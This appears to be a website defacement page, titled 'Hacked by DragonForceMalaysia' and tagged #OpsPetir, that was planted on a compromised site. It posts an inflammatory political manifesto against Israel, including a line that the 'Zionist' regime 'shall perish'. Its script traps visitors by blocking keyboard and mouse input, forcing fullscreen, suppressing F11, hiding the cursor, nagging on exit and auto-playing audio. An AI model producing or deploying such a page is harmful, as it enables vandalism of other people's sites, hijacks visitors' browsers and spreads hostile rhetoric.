<META http-equiv=content-type content=text/html;charset=iso-8859-9>
<META http-equiv=content-type content=text/html;charset=windows-1254>
<META http-equiv=content-type content=text/html;charset=x-mac-turkish>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<meta name="keywords" content="DragonForceMalaysia">
<meta name="description" content="DragonForceMalaysia"><script type="text/javascript">

</script>
<script type="text/javascript">
</script>
    <link rel="stylesheet" href="https://bit.ly/2UGCIC5">
  </head>
<title>Hacked by DragonForceMalaysia</title>

<body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed; oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body">
    
    <script language="JavaScript">
      window.onbeforeunload = confirmExit;

      function confirmExit() {
        return "are you sure ? wkwk";
      }

      function fs() {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
          elem.requestFullscreen();
        } else if (elem.msRequestFullscreen) {
          elem.msRequestFullscreen();
        } else if (elem.mozRequestFullScreen) {
          elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) {
          elem.webkitRequestFullscreen();
        }
        document.getElementById("body").style.cursor = 'none';
        document.onkeydown = function(e) {
          return false;
        }
        document.addEventListener("keydown", e => {
          if (e.key == "F11") e.preventDefault();
        });
      }
    </script>
<script id="rendered-js">

<style>

@import url("https://fonts.googleapis.com/css?family=Paytone+One");
body, html {
  background: #060a19;
  width: 100%;
  height: 100%;
  overflow: hidden;
  font-family: Paytone One;
}

p {
  color: #fff;
  background: #000;
  mix-blend-mode: lighten;
  font-size: 30px;
  text-align: center;
  position: absolute;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: auto;
  height: 100px;
  -moz-animation: filterHue2 2s linear infinite;
  -webkit-animation: filterHue2 2s linear infinite;
  animation: filterHue2 2s linear infinite;
}
p::before {
  content: '';
  display: block;
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  background: #e23b4a;
  background: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuMCIgeTE9IjAuNSIgeDI9IjEuMCIgeTI9IjAuNSI+PHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iIzIzOTY2YyIvPjxzdG9wIG9mZnNldD0iMjUlIiBzdG9wLWNvbG9yPSIjZmFhYTU0Ii8+PHN0b3Agb2Zmc2V0PSI1MCUiIHN0b3AtY29sb3I9IiNlMjNiNGEiLz48c3RvcCBvZmZzZXQ9Ijc1JSIgc3RvcC1jb2xvcj0iI2RiMDc2OCIvPjxzdG9wIG9mZnNldD0iMTAwJSIgc3RvcC1jb2xvcj0iIzM2MDY3MCIvPjwvbGluZWFyR3JhZGllbnQ+PC9kZWZzPjxyZWN0IHg9IjAiIHk9IjAiIHdpZHRoPSIxMDAlIiBoZWlnaHQ9IjEwMCUiIGZpbGw9InVybCgjZ3JhZCkiIC8+PC9zdmc+IA==');
  background: -webkit-gradient(linear, 0% 50%, 100% 50%, color-stop(0%, #23966c), color-stop(25%, #faaa54), color-stop(50%, #e23b4a), color-stop(75%, #db0768), color-stop(100%, #360670));
  background: -moz-linear-gradient(left, #23966c, #faaa54, #e23b4a, #db0768, #360670);
  background: -webkit-linear-gradient(left, #23966c, #faaa54, #e23b4a, #db0768, #360670);
  background: linear-gradient(to right, #23966c, #faaa54, #e23b4a, #db0768, #360670);
  pointer-events: none;
  mix-blend-mode: multiply;
}

.loader-container {
  width: 100px;
  height: 100px;
  position: absolute;
  -moz-animation: scaleUp 0.5s linear;
  -webkit-animation: scaleUp 0.5s linear;
  animation: scaleUp 0.5s linear;
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -webkit-transform: scale(0);
  transform: scale(0);
  opacity: 0;
}
.loader-container .loader {
  background: #ff0c0c;
  background: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9Ii0wLjAzOTYxNCIgeTE9IjAuOTUyNzkiIHgyPSIxLjAzOTYxNCIgeTI9IjAuMDQ3MjEiPjxzdG9wIG9mZnNldD0iMCUiIHN0b3AtY29sb3I9IiNmZjBjMGMiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiMyMWQ0MDAiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=');
  background: -moz-linear-gradient(40deg, #ff0c0c, #21d400);
  background: -webkit-linear-gradient(40deg, #ff0c0c, #21d400);
  background: linear-gradient(50deg, #ff0c0c, #21d400);
  border-radius: 10px;
  -webkit-filter: hue-rotate(0deg);
  filter: hue-rotate(0deg);
  animation: filterHue 2.5s linear infinite;
  height: 100%;
  width: 100%;
  transform: rotate(0deg);
}
.loader-container .loader::after {
  content: '';
  position: absolute;
  height: 80px;
  width: 80px;
  left: 10px;
  top: 10px;
  border-radius: 100%;
}

@-webkit-keyframes $animationName {
  50% {
    -webkit-filter: hue-rotate(1000deg);
    filter: hue-rotate(1000deg);
  }
  100% {
    -webkit-filter: hue-rotate(2000deg);
    filter: hue-rotate(2000deg);
  }
}
@-moz-keyframes filterHue2 {
  50% {
    -webkit-filter: hue-rotate(1000deg);
    filter: hue-rotate(1000deg);
  }
  100% {
    -webkit-filter: hue-rotate(2000deg);
    filter: hue-rotate(2000deg);
  }
}
@-ms-keyframes filterHue2 {
  50% {
    -webkit-filter: hue-rotate(1000deg);
    filter: hue-rotate(1000deg);
  }
  100% {
    -webkit-filter: hue-rotate(2000deg);
    filter: hue-rotate(2000deg);
  }
}
@keyframes filterHue2 {
  50% {
    -webkit-filter: hue-rotate(1000deg);
    filter: hue-rotate(1000deg);
  }
  100% {
    -webkit-filter: hue-rotate(2000deg);
    filter: hue-rotate(2000deg);
  }
}
@-webkit-keyframes $animationName {
  50% {
    -webkit-filter: hue-rotate(1000deg);
    filter: hue-rotate(1000deg);
  }
  100% {
    -webkit-filter: hue-rotate(2000deg);
    filter: hue-rotate(2000deg);
    -moz-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@-moz-keyframes filterHue {
  50% {
    -webkit-filter: hue-rotate(1000deg);
    filter: hue-rotate(1000deg);
  }
  100% {
    -webkit-filter: hue-rotate(2000deg);
    filter: hue-rotate(2000deg);
    -moz-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@-ms-keyframes filterHue {
  50% {
    -webkit-filter: hue-rotate(1000deg);
    filter: hue-rotate(1000deg);
  }
  100% {
    -webkit-filter: hue-rotate(2000deg);
    filter: hue-rotate(2000deg);
    -moz-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes filterHue {
  50% {
    -webkit-filter: hue-rotate(1000deg);
    filter: hue-rotate(1000deg);
  }
  100% {
    -webkit-filter: hue-rotate(2000deg);
    filter: hue-rotate(2000deg);
    -moz-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@-webkit-keyframes $animationName {
  50% {
    -moz-transform: scale(0.5);
    -ms-transform: scale(0.5);
    -webkit-transform: scale(0.5);
    transform: scale(0.5);
    opacity: 1;
  }
  100% {
    -moz-transform: scale(0.25);
    -ms-transform: scale(0.25);
    -webkit-transform: scale(0.25);
    transform: scale(0.25);
  }
}
@-moz-keyframes scaleUp {
  50% {
    -moz-transform: scale(0.5);
    -ms-transform: scale(0.5);
    -webkit-transform: scale(0.5);
    transform: scale(0.5);
    opacity: 1;
  }
  100% {
    -moz-transform: scale(0.25);
    -ms-transform: scale(0.25);
    -webkit-transform: scale(0.25);
    transform: scale(0.25);
  }
}
@-ms-keyframes scaleUp {
  50% {
    -moz-transform: scale(0.5);
    -ms-transform: scale(0.5);
    -webkit-transform: scale(0.5);
    transform: scale(0.5);
    opacity: 1;
  }
  100% {
    -moz-transform: scale(0.25);
    -ms-transform: scale(0.25);
    -webkit-transform: scale(0.25);
    transform: scale(0.25);
  }
}
@keyframes scaleUp {
  50% {
    -moz-transform: scale(0.5);
    -ms-transform: scale(0.5);
    -webkit-transform: scale(0.5);
    transform: scale(0.5);
    opacity: 1;
  }
  100% {
    -moz-transform: scale(0.25);
    -ms-transform: scale(0.25);
    -webkit-transform: scale(0.25);
    transform: scale(0.25);
  }
}
@supports (-ms-ime-align: auto) {
  p {
    color: #21d400;
    background: transparent;
    mix-blend-mode: lighten;
    font-size: 30px;
    text-align: center;
    position: absolute;
    left: 0;
    right: 0;
    top: 0;
    bottom: 0;
    margin: auto;
    height: 100px;
    -moz-animation: filterHue2 2s linear infinite;
    -webkit-animation: filterHue2 2s linear infinite;
    animation: filterHue2 2s linear infinite;
  }

  p::before {
    content: '';
    display: block;
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background: transparent;
  }
}
@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
  p {
    color: #ff447c;
    background: transparent;
    mix-blend-mode: lighten;
    font-size: 30px;
    text-align: center;
    position: absolute;
    left: 0;
    right: 0;
    top: 0;
    bottom: 0;
    margin: auto;
    height: 100px;
    -moz-animation: filterHue2 2s linear infinite;
    -webkit-animation: filterHue2 2s linear infinite;
    animation: filterHue2 2s linear infinite;
  }

  p::before {
    content: '';
    display: block;
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background: transparent;
  }

  .loader {
    background: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9Ii0wLjAzOTYxNCIgeTE9IjAuOTUyNzkiIHgyPSIxLjAzOTYxNCIgeTI9IjAuMDQ3MjEiPjxzdG9wIG9mZnNldD0iMCUiIHN0b3AtY29sb3I9IiNmMDAwNTAiLz48c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiMyMzgwZmYiLz48L2xpbmVhckdyYWRpZW50PjwvZGVmcz48cmVjdCB4PSIwIiB5PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSJ1cmwoI2dyYWQpIiAvPjwvc3ZnPiA=') !important;
    background: -moz-linear-gradient(40deg, #f00050, #2380ff) !important;
    background: -webkit-linear-gradient(40deg, #f00050, #2380ff) !important;
    background: linear-gradient(50deg, #f00050, #2380ff) !important;
  }
}
</style>

  <script src="../codepen.io/assets/common/stopExecutionOnTimeout-8216c69d01441f36c0ea791ae2d4469f0f8ff5326f00ae2d00e4bb7d20e24edb.js"></script>

  
      <script id="rendered-js" >
window.addEventListener("mousemove", function (e) {
  var to_append = document.getElementsByClassName('loader-container')[0];
  var all = document.getElementsByClassName('loader-container');

  var parent_div = document.createElement('div');
  parent_div.className = "loader-container";
  var inner_div = document.createElement('div');
  inner_div.className = "loader";
  parent_div.appendChild(inner_div);
  var d = document.body.appendChild(parent_div);

  parent_div.style.left = e.clientX - 50 + 'px';
  parent_div.style.top = e.clientY - 50 + 'px';

  if (document.getElementsByClassName('loader-container').length > 50) {
    document.body.removeChild(to_append);
  }
});
//# sourceURL=pen.js
    </script>

</head>

<div align="center"></div>


</head>
<body bgcolor=black>
<center>
<font size='6' face='One'style="color: green; text-shadow: 0px 1px 7px red";>#OpsPetir</font><br>

<center><img src="https://i.imgur.com/l04DZJV.png" width="20%"></center>


<font color="#00FF00">



<CENTER><B>  <strong><font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>Greetings The Government of Israel. We Are DragonForceMalaysia</font><br>

<font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>TO ALL MUSLIMS AND HUMANITY AROUND THE WORLD.</p>
<p>IT IS INHUMANE OF US TO JUST SIT STILL AND DO NOTHING.
<red>AGGRESSION, OPPRESSION, OCCUPATION</red> STILL HAPPENS.
APARTHEID IS A CRIME AGAINST HUMANITY AND WE SHALL JOIN FORCES.
BE IT <strong>INDIVIDUAL, CELEBRITIES, PUBLIC FIGURES, ANY MEDIA POWER HOUSE, POLITICAL FIGURES</strong> WHOM STAND THEIR GROUND TO PROTECT WHAT’S LEFT FROM THE EVIL DOING.
A BRUTAL REGIME, <strong><red>ZIONIST</red></strong> SHALL PERISH ALONG WITH GHARQAD AND ITS BELIEVERS.
PROVOCATION SHOULD BE STOPPED AT ALL COSTS.
<red>BLOOD</red> IS IN YOUR HANDS, IF YOU WERE SIT STILL AND DO NOTHING.
</font><br>



<font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>WE CAME, WE SAW AND WE SHARE.</font><br>

<font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>TECHNOLOGIES OF THE MODERN WORLD SHOULD BE USED FOR THE GOOD CAUSE.</font><br>
<font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>RESISTANCE IS FUTILE.</font><br>
<font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>EXPECT THE STORM AND THUNDER!!
FROM THE RIVER TO THE SEA, PALESTINE WILL BE FREE.</font><br>
<font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>>WORLD SHOULD UNITE IN THE NAME OF HUMANITY. ALLAH IS THE ALMIGHTY!! MAY YOU BE REWARDED WITH GOOD DEEDS IN THIS WORLD AND THE HEREAFTER. AMEEN.</font><br>

<font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>#OPSPETIR ENGAGED, Expect us
#DragonForceMalaysia</font><br>


<video autoplay loop allowscriptaccess='always' allowfullscreen='false' width='1' height='0' >

    
	<audio src="http://audio.teamtil.net/quran/mishaari-bin-rashid_al-%60afasy/002%20--%20Surat%20al-Baqarah.mp3" autoplay="true" id="lagu" loop=""></audio>
</script>

</head>

</body>
</div>
</HTML>
